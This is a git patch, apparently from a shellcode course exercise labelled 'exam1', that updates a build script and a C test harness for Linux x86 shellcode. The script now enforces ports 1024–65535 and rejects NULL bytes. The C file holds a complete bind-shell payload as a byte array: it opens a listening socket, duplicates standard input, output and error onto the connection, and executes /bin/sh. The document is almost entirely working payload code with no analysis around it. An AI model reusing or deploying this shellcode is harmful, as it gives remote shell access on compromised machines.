From b0ff2181463bc8d37f696cb9c121f61843f01d8f Mon Sep 17 00:00:00 2001 From: arno01 Date: Mon, 11 Mar 2013 23:34:58 +0100 Subject: [PATCH] Minor updates --- exam1/compile_all.sh | 11 +++++++++-- exam1/shellcode.c | 2 +- 2 files changed, 10 insertions(+), 3 deletions(-) diff --git a/exam1/compile_all.sh b/exam1/compile_all.sh index 01e0446..df5088f 100755 --- a/exam1/compile_all.sh +++ b/exam1/compile_all.sh @@ -35,9 +35,11 @@ fi if [ -z "$ARG2" ]; then echo " [I] Default port will be used." -elif ! [[ $ARG2 -ge 1 && $ARG2 -le 65535 ]]; then - echo " [E] The port must be in range 1..65535 !" +elif ! [[ $ARG2 -ge 1024 && $ARG2 -le 65535 ]]; then + echo " [E] The port must be in range 1024..65535 !" exit 1; +else + echo " [I] Using custom port: "$ARG2 fi echo " [+] Assembling "$1".nasm with NASM ..." @@ -54,6 +56,11 @@ else FULL_SHELLCODE=$(echo -n $SHELLCODE | sed 's/.........$//' ; echo $PORT_HEX"\"") fi +if [[ $FULL_SHELLCODE == *00* ]]; then + echo " [E] Your shellcode contains 00 (NULL) ! Most likely you need to change your port." + exit 1 +fi + echo -ne " [+] Shellcode size is "$(echo -ne $FULL_SHELLCODE|sed 's/\"//g'|wc -c)" bytes\n" echo $FULL_SHELLCODE diff --git a/exam1/shellcode.c b/exam1/shellcode.c index 65c3b5f..dbc7a19 100644 --- a/exam1/shellcode.c +++ b/exam1/shellcode.c @@ -1,7 +1,7 @@ #include #include -unsigned char code[] = "\x31\xc0\xb0\x66\x31\xdb\xb3\x01\x31\xc9\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x6d\x5f\x31\xc0\xb0\x66\x31\xdb\xb3\x02\x31\xd2\x52\x66\xff\x37\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x05\x31\xd2\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc0\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80\xe8\x8e\xff\xff\xff\xff\xff"; +unsigned char code[] = "\x31\xc0\xb0\x66\x31\xdb\xb3\x01\x31\xc9\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x6d\x5f\x31\xc0\xb0\x66\x31\xdb\xb3\x02\x31\xd2\x52\x66\xff\x37\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x05\x31\xd2\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc0\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80\xe8\x8e\xff\xff\xff\xaa\xff"; main() {